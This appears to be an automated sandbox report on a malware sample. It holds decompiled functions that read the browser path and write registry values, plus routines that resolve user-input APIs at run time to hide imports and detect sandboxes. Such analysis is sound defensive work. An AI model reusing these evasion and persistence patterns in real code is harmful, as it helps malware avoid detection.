• Instruction ID: 3fad8cf9e20b9a7c721a7d92192759209fadb61df01daa6405a8acb1fa4b4cc6
• Opcode Fuzzy Hash: e2cd3d883d8a6469c3c95d2af252fb402bfecd5877f52b3bff7841f152166546
• Instruction Fuzzy Hash: 5101F531A00B50AFD7217F36CC8656B7BE5EF01345700097EE58356AB1D6789440CB59
Uniqueness

Uniqueness Score: -1.00%

APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040C256
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 2005118841-1866435925
• Opcode ID: 5cb3b7dfbcab637d0db5144c3dd6879bfc1a86f44dec66821c92e093eba352e9
• Instruction ID: ecda74b64f0aae795754a9d35f2d4a83299d45ae645231e4eb91f75fd87cafa8
• Opcode Fuzzy Hash: 5cb3b7dfbcab637d0db5144c3dd6879bfc1a86f44dec66821c92e093eba352e9
• Instruction Fuzzy Hash: 8201A271944308EED714E7D5CC93FBA73689B50704F1445AFBD01BA5C2EA7C69028AAE
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
			E00410B89(void* __ecx) {
				void* _v8;          // HKEY opened below
				int _v12;           // in/out size (bytes) of the buffer passed to RegQueryValueExW
				char _v2060;        // first byte of the stack buffer that receives the value data
				void* __ebp;
				void* _t17;
				void* _t20;
				void* _t22;
				void* _t23;

				_v12 = 0x400;
				_t22 = __ecx;
				// 0x80000000 = HKEY_CLASSES_ROOT, 0x20019 = KEY_READ. The (Default) value of
				// http\shell\open\command is the command line of the default web browser,
				// so this routine reads the browser path from the registry.
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x4610ec);                    // key not readable: fall back to the constant 0x4610ec
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);   // query the (Default) value
					RegCloseKey(_v8);
					_push( &_v2060);                    // pass the queried command line on
				}
				E0040413E(_t17, _t22, _t20, _t23);      // consumes the pushed string (decompiler shows the push separately)
				return _t22;
			}

APIs
• RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046E600,?), ref: 00410BB3
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410BCE
• RegCloseKey.ADVAPI32(00000000), ref: 00410BD7
Strings
• http\shell\open\command, xrefs: 00410BA9
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID: http\shell\open\command
• API String ID: 3677997916-1487954565
• Opcode ID: ecc569d483912ee7fb832d98fa5ac824910cbea9664234a1c4b76fbe9997402b
• Instruction ID: 1679abcfcf8286d8f63617c11c9f2e3348491008ec7351ab3acca8fe723e8ce1
• Opcode Fuzzy Hash: ecc569d483912ee7fb832d98fa5ac824910cbea9664234a1c4b76fbe9997402b
• Instruction Fuzzy Hash: EEF0C831604118FBDB109695EC09EDFBBBCEB80B05F2001A6B605E6050DA745AC587A5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
			E0040B9C6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int _t37;        // added: used below but left undeclared by the decompiler
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;
				intOrPtr _t76;          // added: copy of _a4, also left undeclared by the decompiler

				// MSVC C++ runtime code (std::_Locinfo constructor, see the LIBCPMT references in
				// the API list), not sample-specific logic: take the locale lock and construct the
				// six _Yarn string members at +4 .. +0x2c.
				_t65 = __ecx;
				E00431C0B(__ecx, 0);                // std::_Lockit::_Lockit
				E0040D691(__ecx + 4);
				E0040D691(__ecx + 0xc);
				E0040D67B(__ecx + 0x14);
				E0040D67B(__ecx + 0x1c);
				E0040D691(__ecx + 0x24);
				E0040D691(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					// a null locale name is rejected with a C++ exception
					_t49 =  &_v16;
					E0040B971(_t49, "bad locale name");
					E00435A36( &_v16, 0x469630);     // __CxxThrowException@8, does not return
					asm("int3");
					// Everything after the int3 is the destructor that follows in memory; the
					// decompiler merged it into this routine because the throw never returns.
					// It releases the same six _Yarn members in reverse order, then the _Lockit.
					_push(_t65);
					_t66 = _t49;
					E00431F9E(_t66);
					E0040D676( &(_t66[0xb]));
					E0040D676( &(_t66[9]));
					E0040D676( &(_t66[7]));
					E0040D676( &(_t66[5]));
					E0040D676( &(_t66[3]));
					E0040D676( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;                   // lock kind stored in the _Lockit object
					__eflags = _t34;
					if(_t34 == 0) {
						return E00441990(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							// 0x18 is sizeof(CRITICAL_SECTION) on x86, so 0x46d050 is the runtime's lock table
							_t37 = 0x46d050 + _t34 * 0x18;
							__eflags = 0x46d050 + _t34 * 0x18;
							return E004324B0(0x46d050 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E00431F53(__ebx, __edx, __edi, _t76, __ecx, _a4);   // std::_Locinfo::_Locinfo_ctor
					return _t65;
				}
			}

APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040B9D1
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BA10
  • Part of subcall function 00431F53: _Yarn.LIBCPMT ref: 00431F72
  • Part of subcall function 00431F53: _Yarn.LIBCPMT ref: 00431F96
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040BA36
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: ed7a60fda07fd8845abb2cab68d107de87f727dfcc98387d51a86573092aaaba
• Instruction ID: 27852d0521b04cf9000d748d5a3116f7c8184cd2c3f5c96d485cec925fe4db60
• Opcode Fuzzy Hash: ed7a60fda07fd8845abb2cab68d107de87f727dfcc98387d51a86573092aaaba
• Instruction Fuzzy Hash: 2EF081319007085AC324FBA5E952E9AB3A8DF15308F60493FF44A620D1AF7DAA1CC6CC
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%
			E00410D87(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;              // HKEY created or opened below
				signed int _t17;        // string length in characters (inferred from the size computation)
				long _t20;              // RegSetValueExW status
				signed int _t22;
				signed int _t23;        // return value: success flag in the low byte

				_push(__ecx);
				_push(_t22);
				// __ecx = root key (0x80000001 = HKEY_CURRENT_USER in the API trace), __edx = subkey path.
				// RegCreateKeyW opens the key if it exists and creates it otherwise.
				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
					_t23 = 0;                           // key could not be created or opened
				} else {
					_t17 = E0040243C();                 // presumably the length of the string object in _a8
					// write value _a4 of type _a32 with the wide string plus its 2-byte terminator
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E00401EC4( &_a8), 2 + _t17 * 2);
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;   // true only when RegSetValueExW returned ERROR_SUCCESS
				}
				E00401EC9();                            // presumably string object cleanup
				return _t23;
			}

APIs
• RegCreateKeyW.ADVAPI32(80000001,00000000,0046E588), ref: 00410D92
• RegSetValueExW.ADVAPI32(0046E5A0,00000000,00000000,?,00000000,00000000,0046E5A0,?,?,00000001), ref: 00410DC1
• RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 00410DCC
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: b3892c34ef9c9399a6682102e51e4ba41ca650181b65b36b4e59269b14b2b947
• Instruction ID: 8ba10e640b7ff33963dbc95539f65f951210b34917a231d0c22b9400e7604ced
• Opcode Fuzzy Hash: b3892c34ef9c9399a6682102e51e4ba41ca650181b65b36b4e59269b14b2b947
• Instruction Fuzzy Hash: 0DF0C232500208BBCF009FA0ED05EEE376CEF40749F104126FD06AA0A1E735DE44DB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E004013C6() {
				_Unknown_base(*)()* _t2;

				// Resolve GetCursorInfo at run time instead of importing it, so the API does not
				// show up in the import table; the pointer is cached in the global at 0x46ea48.
				// Together with GetLastInputInfo (resolved by E0040146B) this lets the sample
				// observe user input activity, one of the user-behaviour checks flagged in the report.
				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x46ea48 = _t2;
				return _t2;
			}

APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013D0
• GetProcAddress.KERNEL32(00000000), ref: 004013D7
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
• Opcode ID: 17a436f0c231b68f29c48d6d8c43f46d226062f3925522f598ed4a751ea82805
• Instruction ID: d9a19aa7c6af00a7fb6208859f10683f2b4e6040f3627d0b5d69e612b00a10b7
• Opcode Fuzzy Hash: 17a436f0c231b68f29c48d6d8c43f46d226062f3925522f598ed4a751ea82805
• Instruction Fuzzy Hash: 3CB092B6546300DB87002BF1AC0E9053A74A784B0B7310262FD0986AA2FBB880C0EB1F
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040146B() {
				_Unknown_base(*)()* _t2;

				// Same pattern as E004013C6, here for GetLastInputInfo (time since the last user
				// input): loaded via LoadLibraryA rather than GetModuleHandleA and cached in the
				// global at 0x46ea4c. Dynamic resolution keeps the API out of the import table.
				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x46ea4c = _t2;
				return _t2;
			}

APIs
• LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401475
• GetProcAddress.KERNEL32(00000000), ref: 0040147C
Strings
Memory Dump Source
• Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
• Opcode ID: acb2eb5f90c274c7122aa55885b0c77f73899a9a43e1970f2275810a078b7ed4
• Instruction ID: 6c407abe68a16bb2361970f4cab9b832f15876ef16f23ccd3ed4a6c27f1e28b1
• Opcode Fuzzy Hash: acb2eb5f90c274c7122aa55885b0c77f73899a9a43e1970f2275810a078b7ed4
• Instruction Fuzzy Hash: DEB09B75585300D7C7001FE16C0D51575647644B0F3340165F505865D5E6744084DF1F
Uniqueness

Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00401488() {
                                                                      				_Unknown_base(*)()* _t2;
                                                                      
                                                                      				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
                                                                      				 *0x46ecb0 = _t2;
                                                                      				return _t2;
                                                                      			}




                                                                      0x00401499
                                                                      0x0040149f
                                                                      0x004014a4

                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00401492
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00401499
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: GetConsoleWindow$kernel32.dll
                                                                      • API String ID: 2574300362-100875112
                                                                      • Opcode ID: 192b7cc7162fc2b4b9d74742374886a399f33b8230ac7d9b473ac14773d98732
                                                                      • Instruction ID: 35dc7208cfdab57e376f6e01d917a950de79aa42861df2b4344d67bf4347f2ef
                                                                      • Opcode Fuzzy Hash: 192b7cc7162fc2b4b9d74742374886a399f33b8230ac7d9b473ac14773d98732
                                                                      • Instruction Fuzzy Hash: DAB092B964A310DBC7001FB0AD0EA057A64B684B0B324062AF601D71E1FFB89080CB1E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 75%
                                                                      			E00447724(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				unsigned int _v20;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				char _v40;
                                                                      				intOrPtr _v48;
                                                                      				char _v52;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* _t86;
                                                                      				signed int _t92;
                                                                      				signed int _t93;
                                                                      				signed int _t94;
                                                                      				signed int _t100;
                                                                      				void* _t101;
                                                                      				void* _t102;
                                                                      				void* _t104;
                                                                      				void* _t107;
                                                                      				void* _t109;
                                                                      				void* _t111;
                                                                      				void* _t115;
                                                                      				char* _t116;
                                                                      				void* _t119;
                                                                      				signed int _t121;
                                                                      				signed int _t128;
                                                                      				signed int* _t129;
                                                                      				signed int _t136;
                                                                      				signed int _t137;
                                                                      				char _t138;
                                                                      				signed int _t139;
                                                                      				signed int _t142;
                                                                      				signed int _t146;
                                                                      				signed int _t151;
                                                                      				char _t156;
                                                                      				char _t157;
                                                                      				void* _t161;
                                                                      				unsigned int _t162;
                                                                      				signed int _t164;
                                                                      				signed int _t166;
                                                                      				signed int _t170;
                                                                      				void* _t171;
                                                                      				signed int* _t172;
                                                                      				signed int _t174;
                                                                      				signed int _t181;
                                                                      				signed int _t182;
                                                                      				signed int _t183;
                                                                      				signed int _t184;
                                                                      				signed int _t185;
                                                                      				signed int _t186;
                                                                      				signed int _t187;
                                                                      
                                                                      				_t171 = __edx;
                                                                      				_t181 = _a24;
                                                                      				if(_t181 < 0) {
                                                                      					_t181 = 0;
                                                                      				}
                                                                      				_t184 = _a8;
                                                                      				 *_t184 = 0;
                                                                      				E004370F7(0,  &_v52, _t171, _a36);
                                                                      				_t5 = _t181 + 0xb; // 0xb
                                                                      				if(_a12 > _t5) {
                                                                      					_t172 = _a4;
                                                                      					_t142 = _t172[1];
                                                                      					_v36 =  *_t172;
                                                                      					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
                                                                      					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
                                                                      						L11:
                                                                      						__eflags = _t142 & 0x80000000;
                                                                      						if((_t142 & 0x80000000) != 0) {
                                                                      							 *_t184 = 0x2d;
                                                                      							_t184 = _t184 + 1;
                                                                      							__eflags = _t184;
                                                                      						}
                                                                      						__eflags = _a28;
                                                                      						_v16 = 0x3ff;
                                                                      						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
                                                                      						__eflags = _t172[1] & 0x7ff00000;
                                                                      						_v32 = _t136;
                                                                      						_t86 = 0x30;
                                                                      						if((_t172[1] & 0x7ff00000) != 0) {
                                                                      							 *_t184 = 0x31;
                                                                      							_t185 = _t184 + 1;
                                                                      							__eflags = _t185;
                                                                      						} else {
                                                                      							 *_t184 = _t86;
                                                                      							_t185 = _t184 + 1;
                                                                      							_t164 =  *_t172 | _t172[1] & 0x000fffff;
                                                                      							__eflags = _t164;
                                                                      							if(_t164 != 0) {
                                                                      								_v16 = 0x3fe;
                                                                      							} else {
                                                                      								_v16 = _v16 & _t164;
                                                                      							}
                                                                      						}
                                                                      						_t146 = _t185;
                                                                      						_t186 = _t185 + 1;
                                                                      						_v28 = _t146;
                                                                      						__eflags = _t181;
                                                                      						if(_t181 != 0) {
                                                                      							_t30 = _v48 + 0x88; // 0x75f68510
                                                                      							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
                                                                      						} else {
                                                                      							 *_t146 = 0;
                                                                      						}
                                                                      						_t92 = _t172[1] & 0x000fffff;
                                                                      						__eflags = _t92;
                                                                      						_v20 = _t92;
                                                                      						if(_t92 > 0) {
                                                                      							L23:
                                                                      							_t33 =  &_v8;
                                                                      							 *_t33 = _v8 & 0x00000000;
                                                                      							__eflags =  *_t33;
                                                                      							_t147 = 0xf0000;
                                                                      							_t93 = 0x30;
                                                                      							_v12 = _t93;
                                                                      							_v20 = 0xf0000;
                                                                      							do {
                                                                      								__eflags = _t181;
                                                                      								if(_t181 <= 0) {
                                                                      									break;
                                                                      								}
                                                                      								_t119 = E004534D0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                      								_t161 = 0x30;
                                                                      								_t121 = _t119 + _t161 & 0x0000ffff;
                                                                      								__eflags = _t121 - 0x39;
                                                                      								if(_t121 > 0x39) {
                                                                      									_t121 = _t121 + _t136;
                                                                      									__eflags = _t121;
                                                                      								}
                                                                      								_t162 = _v20;
                                                                      								_t172 = _a4;
                                                                      								 *_t186 = _t121;
                                                                      								_t186 = _t186 + 1;
                                                                      								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
                                                                      								_t147 = _t162 >> 4;
                                                                      								_t93 = _v12 - 4;
                                                                      								_t181 = _t181 - 1;
                                                                      								_v20 = _t162 >> 4;
                                                                      								_v12 = _t93;
                                                                      								__eflags = _t93;
                                                                      							} while (_t93 >= 0);
                                                                      							__eflags = _t93;
                                                                      							if(_t93 < 0) {
                                                                      								goto L39;
                                                                      							}
                                                                      							_t115 = E004534D0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                                      							__eflags = _t115 - 8;
                                                                      							if(_t115 <= 8) {
                                                                      								goto L39;
                                                                      							}
                                                                      							_t54 = _t186 - 1; // 0xff8bc35f
                                                                      							_t116 = _t54;
                                                                      							_t138 = 0x30;
                                                                      							while(1) {
                                                                      								_t156 =  *_t116;
                                                                      								__eflags = _t156 - 0x66;
                                                                      								if(_t156 == 0x66) {
                                                                      									goto L33;
                                                                      								}
                                                                      								__eflags = _t156 - 0x46;
                                                                      								if(_t156 != 0x46) {
                                                                      									_t139 = _v32;
                                                                      									__eflags = _t116 - _v28;
                                                                      									if(_t116 == _v28) {
                                                                      										_t57 = _t116 - 1;
                                                                      										 *_t57 =  *(_t116 - 1) + 1;
                                                                      										__eflags =  *_t57;
                                                                      									} else {
                                                                      										_t157 =  *_t116;
                                                                      										__eflags = _t157 - 0x39;
                                                                      										if(_t157 != 0x39) {
                                                                      											 *_t116 = _t157 + 1;
                                                                      										} else {
                                                                      											 *_t116 = _t139 + 0x3a;
                                                                      										}
                                                                      									}
                                                                      									goto L39;
                                                                      								}
                                                                      								L33:
                                                                      								 *_t116 = _t138;
                                                                      								_t116 = _t116 - 1;
                                                                      							}
                                                                      						} else {
                                                                      							__eflags =  *_t172;
                                                                      							if( *_t172 <= 0) {
                                                                      								L39:
                                                                      								__eflags = _t181;
                                                                      								if(_t181 > 0) {
                                                                      									_push(_t181);
                                                                      									_t111 = 0x30;
                                                                      									_push(_t111);
                                                                      									_push(_t186);
                                                                      									E004337A0(_t181);
                                                                      									_t186 = _t186 + _t181;
                                                                      									__eflags = _t186;
                                                                      								}
                                                                      								_t94 = _v28;
                                                                      								__eflags =  *_t94;
                                                                      								if( *_t94 == 0) {
                                                                      									_t186 = _t94;
                                                                      								}
                                                                      								__eflags = _a28;
                                                                      								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                      								_t174 = _a4[1];
                                                                      								_t100 = E004534D0( *_a4, 0x34, _t174);
                                                                      								_t137 = 0;
                                                                      								_t151 = (_t100 & 0x000007ff) - _v16;
                                                                      								__eflags = _t151;
                                                                      								asm("sbb ebx, ebx");
                                                                      								if(__eflags < 0) {
                                                                      									L47:
                                                                      									 *(_t186 + 1) = 0x2d;
                                                                      									_t187 = _t186 + 2;
                                                                      									__eflags = _t187;
                                                                      									_t151 =  ~_t151;
                                                                      									asm("adc ebx, 0x0");
                                                                      									_t137 =  ~_t137;
                                                                      									goto L48;
                                                                      								} else {
                                                                      									if(__eflags > 0) {
                                                                      										L46:
                                                                      										 *(_t186 + 1) = 0x2b;
                                                                      										_t187 = _t186 + 2;
                                                                      										L48:
                                                                      										_t182 = _t187;
                                                                      										_t101 = 0x30;
                                                                      										 *_t187 = _t101;
                                                                      										__eflags = _t137;
                                                                      										if(__eflags < 0) {
                                                                      											L56:
                                                                      											__eflags = _t187 - _t182;
                                                                      											if(_t187 != _t182) {
                                                                      												L60:
                                                                      												_push(0);
                                                                      												_push(0xa);
                                                                      												_push(_t137);
                                                                      												_push(_t151);
                                                                      												_t102 = E004531D0();
                                                                      												_v32 = _t174;
                                                                      												 *_t187 = _t102 + 0x30;
                                                                      												_t187 = _t187 + 1;
                                                                      												__eflags = _t187;
                                                                      												L61:
                                                                      												_t104 = 0x30;
                                                                      												_t183 = 0;
                                                                      												__eflags = 0;
                                                                      												 *_t187 = _t151 + _t104;
                                                                      												 *(_t187 + 1) = 0;
                                                                      												goto L62;
                                                                      											}
                                                                      											__eflags = _t137;
                                                                      											if(__eflags < 0) {
                                                                      												goto L61;
                                                                      											}
                                                                      											if(__eflags > 0) {
                                                                      												goto L60;
                                                                      											}
                                                                      											__eflags = _t151 - 0xa;
                                                                      											if(_t151 < 0xa) {
                                                                      												goto L61;
                                                                      											}
                                                                      											goto L60;
                                                                      										}
                                                                      										if(__eflags > 0) {
                                                                      											L51:
                                                                      											_push(0);
                                                                      											_push(0x3e8);
                                                                      											_push(_t137);
                                                                      											_push(_t151);
                                                                      											_t107 = E004531D0();
                                                                      											_v32 = _t174;
                                                                      											 *_t187 = _t107 + 0x30;
                                                                      											_t187 = _t187 + 1;
                                                                      											__eflags = _t187 - _t182;
                                                                      											if(_t187 != _t182) {
                                                                      												L55:
                                                                      												_push(0);
                                                                      												_push(0x64);
                                                                      												_push(_t137);
                                                                      												_push(_t151);
                                                                      												_t109 = E004531D0();
                                                                      												_v32 = _t174;
                                                                      												 *_t187 = _t109 + 0x30;
                                                                      												_t187 = _t187 + 1;
                                                                      												__eflags = _t187;
                                                                      												goto L56;
                                                                      											}
                                                                      											L52:
                                                                      											__eflags = _t137;
                                                                      											if(__eflags < 0) {
                                                                      												goto L56;
                                                                      											}
                                                                      											if(__eflags > 0) {
                                                                      												goto L55;
                                                                      											}
                                                                      											__eflags = _t151 - 0x64;
                                                                      											if(_t151 < 0x64) {
                                                                      												goto L56;
                                                                      											}
                                                                      											goto L55;
                                                                      										}
                                                                      										__eflags = _t151 - 0x3e8;
                                                                      										if(_t151 < 0x3e8) {
                                                                      											goto L52;
                                                                      										}
                                                                      										goto L51;
                                                                      									}
                                                                      									__eflags = _t151;
                                                                      									if(_t151 < 0) {
                                                                      										goto L47;
                                                                      									}
                                                                      									goto L46;
                                                                      								}
                                                                      							}
                                                                      							goto L23;
                                                                      						}
                                                                      					}
                                                                      					__eflags = 0;
                                                                      					if(0 != 0) {
                                                                      						goto L11;
                                                                      					} else {
                                                                      						_t183 = E00447A27(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                                      						__eflags = _t183;
                                                                      						if(_t183 == 0) {
                                                                      							_t128 = E004535B0(_t184, 0x65);
                                                                      							_pop(_t166);
                                                                      							__eflags = _t128;
                                                                      							if(_t128 != 0) {
                                                                      								__eflags = _a28;
                                                                      								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                                      								__eflags = _t170;
                                                                      								 *_t128 = _t170;
                                                                      								 *((char*)(_t128 + 3)) = 0;
                                                                      							}
                                                                      							_t183 = 0;
                                                                      						} else {
                                                                      							 *_t184 = 0;
                                                                      						}
                                                                      						goto L62;
                                                                      					}
                                                                      				} else {
                                                                      					_t129 = E00439941();
                                                                      					_t183 = 0x22;
                                                                      					 *_t129 = _t183;
                                                                      					E0043862C();
                                                                      					L62:
                                                                      					if(_v40 != 0) {
                                                                      						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                                      					}
                                                                      					return _t183;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __alldvrm$_strrchr
                                                                      • String ID:
                                                                      • API String ID: 1036877536-0
                                                                      • Opcode ID: b6bd738f8c391cb391482916d7ea102935042728f0a59d09ddb8518495e1e0bf
                                                                      • Instruction ID: 713674817242878d3e24880b39ffa9d8aee9d9a2e6613fcea8dfc6a1baf33a57
                                                                      • Opcode Fuzzy Hash: b6bd738f8c391cb391482916d7ea102935042728f0a59d09ddb8518495e1e0bf
                                                                      • Instruction Fuzzy Hash: 5CA157B1A082869FFB129F28C8817AEBBE5EF11310F14456FD9859B382C33C9943C758
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			E00452984(signed int __edx, intOrPtr _a4, intOrPtr _a8, int _a12) {
                                                                      				int _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t16;
                                                                      				signed int _t17;
                                                                      				int _t20;
                                                                      				signed int _t21;
                                                                      				int _t23;
                                                                      				signed int _t25;
                                                                      				int _t28;
                                                                      				intOrPtr* _t30;
                                                                      				int _t34;
                                                                      				int _t35;
                                                                      				void* _t36;
                                                                      				intOrPtr* _t37;
                                                                      				intOrPtr* _t38;
                                                                      				int _t46;
                                                                      				void* _t54;
                                                                      				void* _t56;
                                                                      				signed int _t58;
                                                                      				int _t61;
                                                                      				int _t63;
                                                                      				void* _t64;
                                                                      				void* _t65;
                                                                      				void* _t66;
                                                                      
                                                                      				_t58 = __edx;
                                                                      				_t59 = _a4;
                                                                      				_t61 = 0;
                                                                      				_t16 = E00447364(_a4, 0, 0, 1);
                                                                      				_v20 = _t16;
                                                                      				_v16 = __edx;
                                                                      				_t65 = _t64 + 0x10;
                                                                      				if((_t16 & __edx) != 0xffffffff) {
                                                                      					_t17 = E00447364(_t59, 0, 0, 2);
                                                                      					_t66 = _t65 + 0x10;
                                                                      					_t51 = _t17 & __edx;
                                                                      					__eflags = (_t17 & __edx) - 0xffffffff;
                                                                      					if((_t17 & __edx) == 0xffffffff) {
                                                                      						goto L1;
                                                                      					}
                                                                      					_t46 = _a8 - _t17;
                                                                      					__eflags = _t46;
                                                                      					_t20 = _a12;
                                                                      					asm("sbb eax, edx");
                                                                      					_v8 = _t20;
                                                                      					if(__eflags < 0) {
                                                                      						L24:
                                                                      						__eflags = _t20 - _t61;
                                                                      						if(__eflags > 0) {
                                                                      							L19:
                                                                      							_t21 = E00447364(_t59, _v20, _v16, _t61);
                                                                      							__eflags = (_t21 & _t58) - 0xffffffff;
                                                                      							if((_t21 & _t58) != 0xffffffff) {
                                                                      								_t23 = 0;
                                                                      								__eflags = 0;
                                                                      								L31:
                                                                      								return _t23;
                                                                      							}
                                                                      							L20:
                                                                      							_t23 =  *((intOrPtr*)(E00439941()));
                                                                      							goto L31;
                                                                      						}
                                                                      						if(__eflags < 0) {
                                                                      							L27:
                                                                      							_t25 = E00447364(_t59, _a8, _a12, _t61);
                                                                      							_t66 = _t66 + 0x10;
                                                                      							__eflags = (_t25 & _t58) - 0xffffffff;
                                                                      							if((_t25 & _t58) == 0xffffffff) {
                                                                      								goto L20;
                                                                      							}
                                                                      							_t28 = SetEndOfFile(E0044C209(_t59));
                                                                      							__eflags = _t28;
                                                                      							if(_t28 != 0) {
                                                                      								goto L19;
                                                                      							}
                                                                      							 *((intOrPtr*)(E00439941())) = 0xd;
                                                                      							_t30 = E0043992E();
                                                                      							 *_t30 = GetLastError();
                                                                      							goto L20;
                                                                      						}
                                                                      						__eflags = _t46 - _t61;
                                                                      						if(_t46 >= _t61) {
                                                                      							goto L19;
                                                                      						}
                                                                      						goto L27;
                                                                      					}
                                                                      					if(__eflags > 0) {
                                                                      						L6:
                                                                      						_t63 = E00441BB3(_t51, 0x1000, 1);
